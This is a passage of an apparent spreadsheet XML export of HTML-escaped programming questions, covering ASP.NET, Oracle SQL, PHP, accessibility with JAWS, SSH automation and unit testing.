&lt;p&gt;is possible, but can this be expressed neatly using some LINQ syntax? 
I am expecting to implement LINQ methods in &lt;code&gt;class MyTimeSeries&lt;/code&gt; myself.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use an Open Source License</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a little unsure how the open source licensing stuff works.  If I were to choose a particular open source license, what do you actually have to do to make it applicable to your software?  I would imagine it would be a little more involved than just 'stating' that you're releasing your software under LGPL.  And how does this 'contract' bind legally to your software?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery &amp; ASP.Net Resources &amp; Gotchas</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are some good jQuery Resources along with some gotchas when using it with ASP.Net?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Auto start print html page using javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anyway to automatically run &lt;code&gt;javascript:window.print()&lt;/code&gt; when the page finishes loading? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Indexing vs. no indexing when inserting records</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a few questions about whether or not it would be best to not use indexing.&lt;/p&gt;
&lt;p&gt;BACKGROUND:
My records have a timestamp attribute, and the records will be inserted in order of their timestamps (i.e., inserted chronologically).&lt;/p&gt;
&lt;p&gt;QUESTIONS:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;If I DON'T use indexing is it typical for the database to insert the records in the order that they were inserted?  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If answer to #1 is yes, when I do a "SELECT .. WHERE timestamp &gt; X" type query will the database be efficient at it, or will it have to go through every single record since it isn't indexed?  I would assume if there were no index, the database would not "know" that the records were inserted in sorted order and could not, therefore, make use of sorted property of the database.  &lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I assume a clustered index would be best for these types of records &amp;amp; their inserts.&lt;/p&gt;
&lt;p&gt;Please let me know what you guys think.&lt;/p&gt;
&lt;p&gt;Thanks,
jbu&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to access user/site settings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There have been a couple of questions that sort of dealt with this but not covering my exact question so here we go.&lt;/p&gt;
&lt;p&gt;For site settings, if these are stored in a database do you:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;retrieve them from the db every time someone makes a request&lt;/li&gt;
&lt;li&gt;store them in a session variable on login&lt;/li&gt;
&lt;li&gt;???????&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For user specific settings do I do the same as site settings??&lt;/p&gt;
&lt;p&gt;Any guidance/best practice would be greatly appreciated.&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a good way to profile the connection speed of Web users?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a client whose desired Web UI is graphically intense; we would like to gather statistics on the average bandwidth of those connecting to the site. Is there an easy way to do that? The "simplest thing that could possibly work" would seem to be a Flash or Silverlight component that times the download of a file of some size (say 200K), then POSTing the result to a URI that saves the data. Will that work? Should I write my own or is there an easy drop-in element that I can download from somewhere?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the quickest way to get the String contents of a URL using Cocoa/iPhoneSDK?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I want to get the HTML of&lt;/p&gt;
&lt;pre&gt;http://www.google.com&lt;/pre&gt;
&lt;p&gt;as a String using some built-in classes of the Cocoa Touch framework.&lt;/p&gt;
&lt;p&gt;What is the least amount of code I need to write?&lt;/p&gt;
&lt;p&gt;I've gotten this far, but can't figure out how to progress. There must be an easier way.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CFHTTPMessageRef req;
NSURL *url = [NSURL URLWithString:@"http://www.google.com"];
req = CFHTTPMessageCreateRequest(kCFAllocatorDefault,
                                 CFSTR("GET"),
                                 (CFURLRef)url,
                                 kCFHTTPVersion1_1);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Groovlet in Grails apps</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I drop a Groovlet into a Grails app?  Say, for example, in web-app/groovlet.groovy&lt;/p&gt;
&lt;pre&gt;
import java.util.Date
if (session == null) {
  session = request.getSession(true);
}
if (session.counter == null) {
  session.counter = 1
}
println """
&amp;lt;html&gt;
    &amp;lt;head&gt;
        &amp;lt;title&gt;Groovy Servlet&amp;lt;/title&gt;
    &amp;lt;/head&gt;
    &amp;lt;body&gt;
Hello, ${request.remoteHost}: Counter: ${session.counter}! Date: ${new Date()}
&amp;lt;br&gt;
"""
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Get MultiView like behavior with ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to build a generic form submission system using ASP.NET MVC. I'd like to make it as easy as possible to create forms with a form view and a "success" view. Using the WebForms method, this was easy and could be accomplished with templates or multiviews. With MVC, I'm a bit stuck.&lt;/p&gt;
&lt;p&gt;Here's what I'd like to emulate:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% if (formNotSubmitted) { %&amp;gt;
    &amp;lt;% Html.BeginForm(...); %&amp;gt;
        &amp;lt;%= Html.TextBox("FirstName") %&amp;gt;
        &amp;lt;%= Html.TextBox("LastName") %&amp;gt;
        &amp;lt;input id='submit' type='submit' value='Submit' /&amp;gt;
        &amp;lt;%= Html.ValidationSummary %&amp;gt;
    &amp;lt;% Html.EndForm(); %&amp;gt;
&amp;lt;% } else { %&amp;gt;
    &amp;lt;p&amp;gt;Thank you!&amp;lt;/p&amp;gt;
    &amp;lt;p&amp;gt;&amp;lt;img src='thanks.jpg' /&amp;gt;&amp;lt;/p&amp;gt;
    &amp;lt;p&amp;gt;Other items here maybe.&amp;lt;/p&amp;gt;
&amp;lt;% } %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Ideally, I'd like to use Ajax, but also have it work with a straight POST. I'd also like to wrap this somehow to avoid the "if..else" code. What makes this harder than a typical ASP.NET MVC Ajax form is that the controller won't know what the success message/content is supposed to be. Most demos I've seen have the controller send back a message, but I need that code in the view.&lt;/p&gt;
&lt;p&gt;Any guidance is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How is profiling different from logging?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is profiling different from logging?&lt;/p&gt;
&lt;p&gt;Is it just that profiling is used for performance measurements to see how long each function takes?  Or am I off?&lt;/p&gt;
&lt;p&gt;Typically, how are profiling libraries used?&lt;/p&gt;
&lt;p&gt;What types of stats are obtained by profiling?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multi Column Listbox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to bind a Generic List to a multicolumn listbox, yes listbox...I know but this is what I am stuck with and can't add a grid or listview.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What features make a site "social"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you are trying to position your web application as "social" (or Web 2.0), what are the top features you should implement?&lt;/p&gt;
&lt;p&gt;A decent starting point is &lt;a href="http://www.marketingeric.com/12/10-features-every-social-website-should-have/" rel="nofollow"&gt;this page&lt;/a&gt;, but even this perhaps goes a little too far (I think the bar is likely lower).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the ways to obtain HDD serial number without WMI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can get the HDD serial number using &lt;code&gt;ManagementObjectSearcher("SELECT * FROM Win32_PhysicalMedia")&lt;/code&gt;, and for each &lt;code&gt;ManagementObject&lt;/code&gt; from the result set I can read the serial number.&lt;/p&gt;
&lt;p&gt;I am interested in another way of obtaining this information (without WMI) for IDE and SATA HDD, since I get mixed results with my current approach.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt; - It seems that the only alternative is using &lt;code&gt;DeviceIoControl&lt;/code&gt;. Can anyone point me to a full example of C# code invoking &lt;code&gt;DeviceIoControl&lt;/code&gt;? I have no experience using &lt;code&gt;P/Invoke&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Environment: C# 2.0, Windows 2000 or newer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Copying content from a hidden or clipped window in XP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to copy the content of a window (BitBlt) which is hidden, to another window. The problem is that once I hide the source window, the device context I got isn't painted anymore.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm: Voyage planning</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to plan a voyage connecting n locations in the sea with a specified origin and specified destination with following constraints.&lt;br /&gt;
The voyage has to touch all locations.&lt;br /&gt;
If there is a reservation from A to B then a has to be touched before B &lt;br /&gt;
The time spend at each location varies (depends upon the reservations to that location)&lt;br /&gt;
Each location has a working window. If the vessel reaches before working window it has to wait.&lt;br /&gt;
Note: "Minimum spanning tree" algorithms may not be as the time required at each port depends on the previous route (due to working window)&lt;br /&gt;
Is there any algorithm available for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Display Ajax Loader while page rendering</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is probably a simple question but how can I best use an AJAX loader in ASP.NET to provide a loading dialog whilst the page is being built?&lt;/p&gt;
&lt;p&gt;I currently have an UpdatePanel with an associated UpdateProgressPanel which contains the loading message and gif in a ProgressTemplate. &lt;/p&gt;
&lt;p&gt;Currently I have a page that onLoad() goes and gets the business entities and then displays them. While it is doing this I would like to display an AJAX loader. &lt;/p&gt;
&lt;p&gt;Would it be better to have nothing in the page load and have a hidden button that is triggered onLoadComplete or unLoad() which would then wait for the button click method to complete displaying the UpdateProgressPanel? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I change the size of scroll box(thumb) of a CScrollBar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't find any method to change it. Any help will be appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails meta plugin install script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wanna see if there is an approach to pack a few plugins together as a meta plugin that install everything together automatically, works like a project template.&lt;/p&gt;
&lt;p&gt;Why not a script? Because I want to put it in github so I don't have to worry about it when I am not with my own PC :) but of coz a script based solution is welcomed too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is mutation testing useful in practice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you have any examples of real life applications of mutation testing? Does it work better than simple test coverage tools? Or is it useless?&lt;/p&gt;
&lt;p&gt;What are the advantages/disadvantages of mutation testing in the real world?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Downsides to using Int64 universally instead of int (C#)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We use a base entity with properties such as version (datetime needed for NHibernate) and guid (as key).&lt;/p&gt;
&lt;p&gt;It also has an Id (int) field with two functions.  Firstly to relate to legacy application key if there is one.  Secondly as a shorthand code: for instance files are sometimes created based on these which would look ugly and long using our guid key.  My question is not really about pros and cons of base entities but about up-typing this Id to Int64?&lt;/p&gt;
&lt;p&gt;It would not affect how it is stored within our MS SQL Server database. Would it have more cost in our cache and memory?.  Is this really that much of a worry?&lt;/p&gt;
&lt;p&gt;I am interested to hear other downsides besides performance.  Consider also these values will probably be exposed through web services to third parties in time too.&lt;/p&gt;
&lt;p&gt;The alternative is to deal with the exceptions of larger integers as they arise and implement them specifically in derived entities.  The downside is this would need to be done in code and what would we do when we discover some cases when in production of larger integers?  There would of course be input validation to stop actual errors but it may restrict expanding data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to set the PYTHONPATH in Emacs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Emacs does not recognize my correct python path. I think it is a general problem with emacs not recognizing my environment variables. I have GNU Emacs 22.1.1 (i386-apple-darwin8.9.1, Carbon Version 1.6.0) of 2007-06-17 installed.&lt;/p&gt;
&lt;p&gt;I have set the PYTHONPATH in my ~/.bashrc. Maybe I should set it somewhere else?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Session State Server - Saving Unserialized Data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As you know, in ASP.NET, you can store session data in one of following three modes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;InProc&lt;/li&gt;
&lt;li&gt;Session State &lt;/li&gt;
&lt;li&gt;SQL Server&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For InProc mode, you can store any kind of data objects even it's not serializable. However, in Session State and SQL Server modes, you can only store serialized data. &lt;/p&gt;
&lt;p&gt;In my project, I have a ready made portal which use "InProc" mode to store its session. I need to use Session State instead due to some scalability and failure handling issues. &lt;/p&gt;
&lt;p&gt;The problem that this portal is internally storing unserialized objects in the session context (i.e The stored objects doesn't implement ISerializable interface). I have no access to their code. Is there any work around so that I can be able to store the session objects in State Server without changing their code. I still have access to their web.config file if this would help in any kind.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I find out which control events will fire on an ASP postback?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to get a list of control events that are going to fire before they happen, say inside the &lt;code&gt;Page_Load&lt;/code&gt; handler?&lt;/p&gt;
&lt;p&gt;For example if a button was clicked can I figure this out before the &lt;code&gt;button_click&lt;/code&gt; event handler is called?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing input to a state machine (c#)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'll try to explain my scenario as best i can;&lt;/p&gt;
&lt;p&gt;At each application &lt;em&gt;tick&lt;/em&gt; I query the current state of the keyboard and mouse and wrap them in individual classes and data structures. For the keyboard it's an array of my &lt;em&gt;Keys&lt;/em&gt; enum (one item for each of the keys that are currently pressed) and for the mouse it's a class containing coordinate delta's and bools for each buttons pressed.&lt;/p&gt;
&lt;p&gt;I also have a rudimentary state machine managed via a state manager class which maintains the stack and marshalls the states.&lt;/p&gt;
&lt;p&gt;All I want to know is, how best to pass the input (snapshots) to the individual states my app can be in at any one time?&lt;/p&gt;
&lt;p&gt;I would like to process as much of the input as possible away from the individual states, so as to reduce repeating logic within the states.&lt;/p&gt;
&lt;p&gt;Or would it be better to keep the input snapshots as pure as possible and pass them to the states so they can keep they're input-specific-logic hidden?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;&lt;br/&gt;
This structure is similiar to how I imagine a game would work, and although this application is not a game it does need to be processed as quickly as possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some useful PHP Idioms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to improve my PHP coding and am wondering what PHP-specific techniques other programmers use to improve productivity or workaround PHP limitations.&lt;/p&gt;
&lt;p&gt;Some examples:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Class naming convention to handle namespaces: &lt;code&gt;Part1_Part2_ClassName&lt;/code&gt; maps to file &lt;code&gt;Part1/Part2/ClassName.php&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;if ( count($arrayName) ) // handles $arrayName being unset or empty&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Variable function names, e.g. &lt;code&gt;$func = 'foo'; $func($bar); // calls foo($bar);&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Oracle PL/SQL Query Order By issue with Distinct</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know what is wrong with this query?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; SELECT DISTINCT c.CN as ClaimNumber, 
         a.ItemDate as BillReceivedDate, c.DTN as
 DocTrackNumber
         FROM ItemData a,
         ItemDataPage b,
         KeyGroupData c
         WHERE a.ItemTypeNum in (112, 113, 116, 172, 189)
         AND a.ItemNum = b.ItemNum
         AND b.ItemNum = c.ItemNum
         ORDER BY a.DateStored DESC;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have done T-Sql most of my career and this looks correct to me, however this query is for an Oracle database and Toad just places the cursor on the a.DateStored in the Order By section. I'm sure this is elementary for anyone doing PL/SQL.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;[EDIT] For future reference, the error given by SQL*Plus was: "ORA-01791: not a SELECTed expression"  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>adodb and access changing Â® to Ã‚Â®</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i connecting to a access database with php and adodb. Strings with characters like Â® are saved in the database as Ã‚Â® . 
What can i do to store it correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to fake a validation error in a MonoRail controller unit-test?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am running on Castle's trunk, and trying to unit-test a controller-action where validation of my DTO is set up.  The controller inherits from SmartDispatcherController.  The action and DTO look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
[AccessibleThrough(Verb.Post)]
public void Register([DataBind(KeyReg, Validate = true)] UserRegisterDto dto)
{
    CancelView();
    if (HasValidationError(dto))
    {
    	Flash[KeyReg] = dto;
    	Errors = GetErrorSummary(dto);
    	RedirectToAction(KeyIndex);
    }
    else
    {
    	var user = new User { Email = dto.Email };
    	// TODO: Need to associate User with an Owning Account
    	membership.AddUser(user, dto.Password);
    	RedirectToAction(KeyIndex);
    }
}
public class UserRegisterDto
{
    [ValidateNonEmpty]
    [ValidateLength(1, 100)]
    [ValidateEmail]
    public string Email { get; set; }
    [ValidateSameAs("Email")]
    public string EmailConfirm { get; set; }
    [ValidateNonEmpty]
    public string Password { get; set; }
    [ValidateSameAs("Password")]
    public string PasswordConfirm { get; set; }
    // TODO: validate is not empty Guid
    [ValidateNonEmpty]
    public string OwningAccountIdString { get; set; }
    public Guid OwningAccountId
    {
    	get { return new Guid(OwningAccountIdString); }
    }
    [ValidateLength(0, 40)]
    public string FirstName { get; set; }
    [ValidateLength(0, 60)]
    public string LastName { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The unit test looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
[Fact]
public void Register_ShouldPreventInValidRequest()
{
    PrepareController(home, ThorController.KeyPublic, ThorController.KeyHome, HomeController.KeyRegister);
    var dto = new UserRegisterDto { Email = "ff" };
    home.Register(dto);
    Assert.True(Response.WasRedirected);
    Assert.Contains("/public/home/index", Response.RedirectedTo);
    Assert.NotNull(home.Errors);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;("home" is my HomeController instance in the test; home.Errors holds a reference to an ErrorSummary which should be put into the Flash when there's a validation error).&lt;/p&gt;
&lt;p&gt;I am seeing the debugger think that dto has no validation error; it clearly should have several failures, the way the test runs.&lt;/p&gt;
&lt;p&gt;I have read &lt;a href="http://joeydotnet.com/blog/archive/2007/10/25/monorail-controller-test-analysis---problem-and-resolution.aspx" rel="nofollow"&gt;Joey's blog post on this&lt;/a&gt;, but it looks like the Castle trunk has moved on since this was written.  Can someone shed some light, please?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I automate running commands remotely over SSH?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've searched around a bit for similar questions, but other than running one command or perhaps a few command with items such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ssh user@host -t sudo su -
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, what if I essentially need to run a script on (let's say) 15 servers at once. Is this doable in bash? In a perfect world I need to avoid installing applications if at all possible to pull this off. For argument's sake, let's just say that I need to do the following across 10 hosts:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Deploy a new Tomcat container&lt;/li&gt;
&lt;li&gt;Deploy an application in the container, and configure it&lt;/li&gt;
&lt;li&gt;Configure an Apache vhost&lt;/li&gt;
&lt;li&gt;Reload Apache&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I have a script that does all of that, but it relies on me logging into all the servers, pulling a script down from a repo, and then running it. If this isn't doable in bash, what alternatives do you suggest? Do I need a bigger hammer, such as Perl (Python might be preferred since I can guarantee Python is on all boxes in a RHEL environment thanks to yum/up2date)? If anyone can point to me to any useful information it'd be greatly appreciated, especially if it's doable in bash. I'll settle for Perl or Python, but I just don't know those as well (working on that). Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Assign auto-incrementing value to new column in Oracle</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this table in an Oracle DB which has a primary key defined on 3 of the data columns. I want to drop the primary key constraint to allow rows with duplicate data for those columns, and create a new column, 'id', to contain an auto-incrementing integer ID for these rows. I know how to create a sequence and trigger to add an auto-incrementing ID for new rows added to the table, but is it possible to write a PL/SQL statement to add unique IDs to all the rows that are already in the table?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are hidden form elements still read by JAWS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;The Situation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have an area of the screen that can be shown and hidden via JavaScript (something like "show/hide advanced search options"). Inside this area there are form elements (select, checkbox, etc). For users using assistive technology like a screen-reader (in this case JAWS), we need to link these form elements with a label or use the "title" attribute to describe the purpose of each element. I'm using the title attribute because there isn't enough space for a label, and the tooltip you get is nice for non-screen-reader users.&lt;/p&gt;
&lt;p&gt;The code looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="placeholder" style="display:none;"&amp;gt;
  &amp;lt;select title="Month"&amp;gt;
    &amp;lt;option&amp;gt;January&amp;lt;/option&amp;gt;
    &amp;lt;option&amp;gt;February&amp;lt;/option&amp;gt;
    ...
  &amp;lt;/select&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;The Problem&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Normally, JAWS will not read hidden elements... because well, they're hidden and it knows that. However, it seems as though if the element has a title set, JAWS reads it no matter what. If I remove the title, JAWS reads nothing, but obviously this is in-accessible markup.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Possible Solutions&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;My first thought was to use a hidden label instead of the title, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="placeholder" style="display:none;"&amp;gt;
  &amp;lt;label for="month" style="display:none"&amp;gt;Month&amp;lt;/label&amp;gt;
  &amp;lt;select id="month"&amp;gt;...&amp;lt;/select&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This results in the exact same behavior, and now we lose the tool-tips for non-screen-reader users. Also we end up generating twice as much Html.&lt;/p&gt;
&lt;p&gt;The second option is to still use a label, put position it off the screen. That way it will be read by the screen-reader, but won't be seen by the visual user:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="placeholder" style="display:none;"&amp;gt;
  &amp;lt;label for="month" style="position:absolute;left:-5000px:width:1px;"&amp;gt;Month&amp;lt;/label&amp;gt;
  &amp;lt;select id="month"&amp;gt;...&amp;lt;/select&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This actually works, but again we lose the tool-tip and still generate additional Html.&lt;/p&gt;
&lt;p&gt;My third possible solution is to recursively travel through the DOM in JavaScript, removing the title when the area is hidden and adding it back when the area is shown. This also works... but is pretty ugly for obvious reasons and doesn't really scale well to a more general case.&lt;/p&gt;
&lt;p&gt;Any other ideas anyone? Why is JAWS behaving this way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VB.NET Importing Classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen some code where a &lt;em&gt;Class&lt;/em&gt; is imported, instead of a namespace, making all the static members/methods of that class available.  Is this a feature of VB?  Or do other languages do this as well?&lt;/p&gt;
&lt;p&gt;TestClass.vb&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class TestClass
    public shared function Somefunc() as Boolean
    	return true
    end function
end class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;MainClass.vb&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;imports TestClass
public class MainClass
    public sub Main()
    	Somefunc()
    end sub
end class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These files are in the App_Code directory.  Just curious, because I've never thought of doing this before, nor have I read about it anywhere. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apache Abdera Client - Posting/Putting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Looking for help using the Apache Abdera Atom Client.  I am trying to post and put files to a feed but I am getting a 400 error saying that the content type must be &lt;code&gt;application/x-www-form-urlencoded&lt;/code&gt; or &lt;code&gt;multipart/form-data&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strange error when creating Excel files with Spreadsheet_Excel_Writer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the code.  Not much to it.  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
include("Spreadsheet/Excel/Writer.php");
$xls = new Spreadsheet_Excel_Writer();
$sheet = $xls-&amp;gt;addWorksheet('At a Glance');
$colNames = array('Foo', 'Bar');
$sheet-&amp;gt;writeRow(0, 0, $colNames, $colHeadingFormat);
for($i=1; $i&amp;lt;=10; $i++)
{
    $row = array( "foo $i", "bar $i");
    $sheet-&amp;gt;writeRow($rowNumber++, 0, $row);
}
header ("Expires: " . gmdate("D,d M Y H:i:s") . " GMT");
header ("Last-Modified: " . gmdate("D,d M Y H:i:s") . " GMT");
header ("Cache-Control: no-cache, must-revalidate");
header ("Pragma: no-cache");
$xls-&amp;gt;send("test.xls");
$xls-&amp;gt;close();
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The issue is that I get the following error when I actually open the file with Excel:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;File error:  data may have been lost.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Even stranger is the fact that, despite the error, the file seems fine.  Any data I happen to be writing is there.&lt;/p&gt;
&lt;p&gt;Any ideas on how to get rid of this error?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h3&gt;Edit&lt;/h3&gt;
&lt;p&gt;I've modified the code sample to better illustrate the problem.  I don't think the first sample was a legit test.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does silverlight code need protection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't quite understand how Silverlight code works within the browser. Are the assemblies downloaded to the client machine? Is there any chance of the code getting decompiled using Reflector or some similar tool? If so, what options does one have to protect the code? Do .net obfuscators work with Silverlight?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating a System.Web.Caching.Cache object in a unit test</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to implement a unit test for a function in a project that doesn't have unit tests and this function requires a System.Web.Caching.Cache object as a parameter. I've been trying to create this object by using code such as...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Web.Caching.Cache cache = new System.Web.Caching.Cache();
cache.Add(...);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...and then passing the 'cache' in as a parameter but the Add() function is causing a NullReferenceException. My best guess so far is that I can't create this cache object in a unit test and need to retrieve it from the HttpContext.Current.Cache which I obviously don't have access to in a unit test.&lt;/p&gt;
&lt;p&gt;How do you unit test a function that requires a System.Web.Caching.Cache object as a parameter?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>wxPython wxDC object from win32gui.GetDC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting a DC for a window handle of an object in another program using win32gui.GetDC which returns an int/long.  I need to blit this DC into a memory DC in python.  The only thing I can't figure out how to do is get a wxDC derived object from the int/long that win32gui returns.  None of the wxDC objects allow me to pass an actual DC handle to them from what I can tell.  This of course keeps me from doing my blit. Is there any way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Farpoint spreadsheet - disable cell right click menu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Farpoint Spreadsheet for WinForms with C#. 
How can I disable the "context menu" displayed when right-clicking over a cell that is being edited?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Query antivirus definitions date?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible at all to query (WMI?) the virus defnintions date of definitions installed on remote computers? I'd like to start specificially with Symantec Endpoint Protection, and then branch out to other antivirus products.&lt;/p&gt;
&lt;p&gt;This is a WinForms, .NET project.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the proper syntax for a cross-table SQL query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Right now, I have &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT gp_id FROM gp.keywords 
WHERE keyword_id = 15 
AND (SELECT practice_link FROM gp.practices 
     WHERE practice_link IS NOT NULL 
     AND id = gp_id)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This does not provide a syntax error, however for values where it should return row(s), it just returns 0 rows.&lt;/p&gt;
